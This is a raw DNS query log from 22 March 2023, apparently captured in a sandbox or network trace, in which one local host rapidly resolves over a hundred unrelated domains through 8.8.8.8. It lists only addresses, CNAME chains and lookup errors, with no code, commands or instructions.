                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.318960905 CET8.8.8.8192.168.2.50x656eNo error (0)adeesa.net172.67.209.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.324925900 CET8.8.8.8192.168.2.50x946eName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.342129946 CET8.8.8.8192.168.2.50xcfc8No error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.342129946 CET8.8.8.8192.168.2.50xcfc8No error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.396380901 CET8.8.8.8192.168.2.50x50f7Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.401530981 CET8.8.8.8192.168.2.50x5b3bNo error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.423798084 CET8.8.8.8192.168.2.50x7957No error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.423798084 CET8.8.8.8192.168.2.50x7957No error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.423798084 CET8.8.8.8192.168.2.50x7957No error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.426543951 CET8.8.8.8192.168.2.50x3476Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.435389042 CET8.8.8.8192.168.2.50x38deName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.493940115 CET8.8.8.8192.168.2.50x516No error (0)rkengg.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.493940115 CET8.8.8.8192.168.2.50x516No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.493940115 CET8.8.8.8192.168.2.50x516No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.493940115 CET8.8.8.8192.168.2.50x516No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.535823107 CET8.8.8.8192.168.2.50xea6aNo error (0)shteeble.com185.106.129.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.642812014 CET8.8.8.8192.168.2.50xc5f8No error (0)umcor.am188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.642812014 CET8.8.8.8192.168.2.50xc5f8No error (0)umcor.am188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.653211117 CET8.8.8.8192.168.2.50x55c8No error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.666429996 CET8.8.8.8192.168.2.50x7158No error (0)peminet.net198.54.117.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.683907032 CET8.8.8.8192.168.2.50x8491Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.727785110 CET8.8.8.8192.168.2.50x7a57No error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.727785110 CET8.8.8.8192.168.2.50x7a57No error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.734615088 CET8.8.8.8192.168.2.50xb206Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.745321035 CET8.8.8.8192.168.2.50x28e1No error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.771066904 CET8.8.8.8192.168.2.50xedadNo error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.777158022 CET8.8.8.8192.168.2.50xdbbcNo error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.806231976 CET8.8.8.8192.168.2.50x1092No error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.811333895 CET8.8.8.8192.168.2.50xf2d9No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.811333895 CET8.8.8.8192.168.2.50xf2d9No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.811333895 CET8.8.8.8192.168.2.50xf2d9No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.811333895 CET8.8.8.8192.168.2.50xf2d9No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.860997915 CET8.8.8.8192.168.2.50x2d13Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.887229919 CET8.8.8.8192.168.2.50x23c3Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.906763077 CET8.8.8.8192.168.2.50x60bbServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.947417021 CET8.8.8.8192.168.2.50xa173No error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.961846113 CET8.8.8.8192.168.2.50x8602Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.963356018 CET8.8.8.8192.168.2.50xcb8dNo error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.009361982 CET8.8.8.8192.168.2.50xf2f6No error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.009361982 CET8.8.8.8192.168.2.50xf2f6No error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.009361982 CET8.8.8.8192.168.2.50xf2f6No error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.012552023 CET8.8.8.8192.168.2.50xe717No error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.061085939 CET8.8.8.8192.168.2.50x9d50Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.070802927 CET8.8.8.8192.168.2.50x51c2No error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.070802927 CET8.8.8.8192.168.2.50x51c2No error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.228625059 CET8.8.8.8192.168.2.50xab19No error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.228625059 CET8.8.8.8192.168.2.50xab19No error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.380641937 CET8.8.8.8192.168.2.50xb3e7No error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.381844044 CET8.8.8.8192.168.2.50xef5aNo error (0)ldh.la.gov75.2.95.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.399615049 CET8.8.8.8192.168.2.50x2eb0No error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.431792974 CET8.8.8.8192.168.2.50x20a6No error (0)biosolve.com151.101.130.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.527570963 CET8.8.8.8192.168.2.50x8dbcNo error (0)wvs-net.de188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.527570963 CET8.8.8.8192.168.2.50x8dbcNo error (0)wvs-net.de188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.548605919 CET8.8.8.8192.168.2.50xb2b4No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.619185925 CET8.8.8.8192.168.2.50xee8aName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.631316900 CET8.8.8.8192.168.2.50x3820No error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.643835068 CET8.8.8.8192.168.2.50x12f0Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.655670881 CET8.8.8.8192.168.2.50xd22No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.724530935 CET8.8.8.8192.168.2.50xbbbNo error (0)araax.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.724530935 CET8.8.8.8192.168.2.50xbbbNo error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.724530935 CET8.8.8.8192.168.2.50xbbbNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.724530935 CET8.8.8.8192.168.2.50xbbbNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.771368980 CET8.8.8.8192.168.2.50x6b8eNo error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.875821114 CET8.8.8.8192.168.2.50xac72No error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.875821114 CET8.8.8.8192.168.2.50xac72No error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.875821114 CET8.8.8.8192.168.2.50xac72No error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.875821114 CET8.8.8.8192.168.2.50xac72No error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.964073896 CET8.8.8.8192.168.2.50xf62eNo error (0)4locals.net80.82.115.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.072128057 CET8.8.8.8192.168.2.50x208aNo error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.072128057 CET8.8.8.8192.168.2.50x208aNo error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.181015968 CET8.8.8.8192.168.2.50xfb40No error (0)sanfotek.net97.74.42.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.213839054 CET8.8.8.8192.168.2.50x829bNo error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.213839054 CET8.8.8.8192.168.2.50x829bNo error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.281656981 CET8.8.8.8192.168.2.50xa7c5No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.362199068 CET8.8.8.8192.168.2.50x7f39No error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.376084089 CET8.8.8.8192.168.2.50x5fccNo error (0)ascc.org.au203.210.102.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.414030075 CET8.8.8.8192.168.2.50xea9bName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.442384958 CET8.8.8.8192.168.2.50xb01fNo error (0)plaske.ua52.211.245.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.469808102 CET8.8.8.8192.168.2.50x5309Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.488466024 CET8.8.8.8192.168.2.50xad8bName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.503242016 CET8.8.8.8192.168.2.50x5f90No error (0)forbin.net172.67.148.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.503242016 CET8.8.8.8192.168.2.50x5f90No error (0)forbin.net104.21.41.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.527847052 CET8.8.8.8192.168.2.50x4140No error (0)bount.com.tw188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.527847052 CET8.8.8.8192.168.2.50x4140No error (0)bount.com.tw188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.527870893 CET8.8.8.8192.168.2.50x1660Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.530925035 CET8.8.8.8192.168.2.50xb667No error (0)ifesnet.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.530925035 CET8.8.8.8192.168.2.50xb667No error (0)ifesnet.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.541563988 CET8.8.8.8192.168.2.50x754eNo error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.551367998 CET8.8.8.8192.168.2.50xd406No error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.577737093 CET8.8.8.8192.168.2.50x5888No error (0)revoldia.net45.200.235.135A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.585041046 CET8.8.8.8192.168.2.50xa8ddNo error (0)eos-i.commacx1980.qy56.supcname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.585041046 CET8.8.8.8192.168.2.50xa8ddNo error (0)macx1980.qy56.supcname.commfddos.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.585041046 CET8.8.8.8192.168.2.50xa8ddNo error (0)mfddos.datacname.com15.204.18.132.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.585041046 CET8.8.8.8192.168.2.50xa8ddNo error (0)15.204.18.132.datacname.com15.204.18.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.593354940 CET8.8.8.8192.168.2.50x5eb5No error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.633424997 CET8.8.8.8192.168.2.50xdadbNo error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.633424997 CET8.8.8.8192.168.2.50xdadbNo error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.639516115 CET8.8.8.8192.168.2.50x5224No error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.692019939 CET8.8.8.8192.168.2.50xbdb6No error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.694658041 CET8.8.8.8192.168.2.50x5e49No error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.741600037 CET8.8.8.8192.168.2.50x54ccNo error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.741600037 CET8.8.8.8192.168.2.50x54ccNo error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.781071901 CET8.8.8.8192.168.2.50x99a7No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.842061996 CET8.8.8.8192.168.2.50xec15No error (0)vivastay.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.842061996 CET8.8.8.8192.168.2.50xec15No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.842061996 CET8.8.8.8192.168.2.50xec15No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.842061996 CET8.8.8.8192.168.2.50xec15No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.844851971 CET8.8.8.8192.168.2.50x3e75No error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.844851971 CET8.8.8.8192.168.2.50x3e75No error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.844851971 CET8.8.8.8192.168.2.50x3e75No error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.940675020 CET8.8.8.8192.168.2.50x2e80Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.957254887 CET8.8.8.8192.168.2.50xfff7No error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.967706919 CET8.8.8.8192.168.2.50x5bbServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.970771074 CET8.8.8.8192.168.2.50x16a6Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.040788889 CET8.8.8.8192.168.2.50xb4d8Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.060904026 CET8.8.8.8192.168.2.50x4e24No error (0)assideum.com52.219.103.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.064429045 CET8.8.8.8192.168.2.50x8387No error (0)iranytu.net103.224.212.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.089178085 CET8.8.8.8192.168.2.50x353dNo error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.098507881 CET8.8.8.8192.168.2.50x298cNo error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.188920975 CET8.8.8.8192.168.2.50xdb56Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.233639002 CET8.8.8.8192.168.2.50xb50cNo error (0)envogen.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.233639002 CET8.8.8.8192.168.2.50xb50cNo error (0)envogen.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.284924984 CET8.8.8.8192.168.2.50xc873Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.301095009 CET8.8.8.8192.168.2.50x8cd7Name error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.309129000 CET8.8.8.8192.168.2.50x3a0fNo error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.309129000 CET8.8.8.8192.168.2.50x3a0fNo error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.309129000 CET8.8.8.8192.168.2.50x3a0fNo error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.324331045 CET8.8.8.8192.168.2.50x4133No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.388413906 CET8.8.8.8192.168.2.50xe24eServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.401437044 CET8.8.8.8192.168.2.50xb228No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.434190035 CET8.8.8.8192.168.2.50x9b56No error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.437403917 CET8.8.8.8192.168.2.50x6045No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.619765997 CET8.8.8.8192.168.2.50x2916No error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.692454100 CET8.8.8.8192.168.2.50x354bNo error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.730871916 CET8.8.8.8192.168.2.50x7c67No error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.740314007 CET8.8.8.8192.168.2.50xa18aNo error (0)shteeble.com185.106.129.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.822340012 CET8.8.8.8192.168.2.50x4a2bNo error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.896768093 CET8.8.8.8192.168.2.50x4773No error (0)kayoaiba.com154.213.117.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.940303087 CET8.8.8.8192.168.2.50x5ea4No error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.940303087 CET8.8.8.8192.168.2.50x5ea4No error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.109658957 CET8.8.8.8192.168.2.50xa273No error (0)akr.co.id104.20.123.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.109658957 CET8.8.8.8192.168.2.50xa273No error (0)akr.co.id172.67.33.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.109658957 CET8.8.8.8192.168.2.50xa273No error (0)akr.co.id104.20.122.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.111759901 CET8.8.8.8192.168.2.50xaaefNo error (0)cjcagent.com157.112.187.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.236884117 CET8.8.8.8192.168.2.50x6e65No error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.291924953 CET8.8.8.8192.168.2.50x63d3No error (0)umcor.am188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.291924953 CET8.8.8.8192.168.2.50x63d3No error (0)umcor.am188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.350872993 CET8.8.8.8192.168.2.50xa56cNo error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.411920071 CET8.8.8.8192.168.2.50x8c76No error (0)shesfit.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.411920071 CET8.8.8.8192.168.2.50x8c76No error (0)shesfit.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.512486935 CET8.8.8.8192.168.2.50xbb07No error (0)dyag-eng.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.566243887 CET8.8.8.8192.168.2.50x5bbServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.615211964 CET8.8.8.8192.168.2.50x1f29No error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.615211964 CET8.8.8.8192.168.2.50x1f29No error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.742806911 CET8.8.8.8192.168.2.50x6cfcNo error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:52.180324078 CET8.8.8.8192.168.2.50xb3bNo error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:52.302428961 CET8.8.8.8192.168.2.50x6228No error (0)hyabmagneter.se104.21.69.146A (IP address)IN (0x0001)false
